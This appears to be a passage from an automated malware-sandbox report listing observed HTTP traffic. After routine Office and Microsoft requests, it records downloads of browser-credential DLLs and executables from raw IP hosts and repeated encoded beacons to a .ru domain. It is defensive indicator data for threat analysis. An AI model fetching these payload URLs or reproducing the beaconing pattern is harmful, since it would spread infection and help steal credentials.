Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /profiles/76561199015584404/inventory/ HTTP/1.1Referer: https://steamcommunity.com/profiles/76561199015584404Accept: text/javascript, text/html, application/xml, text/xml, /Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheDNT: 1Pragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36host: steamcommunity.comConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /thebig/stories.exe HTTP/1.1Host: 176.113.115.203
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Fri, 15 Nov 2024 12:59:20 GMTIf-None-Match: "673745a8-1ba800"
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c444db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692386688f817c2e89c HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
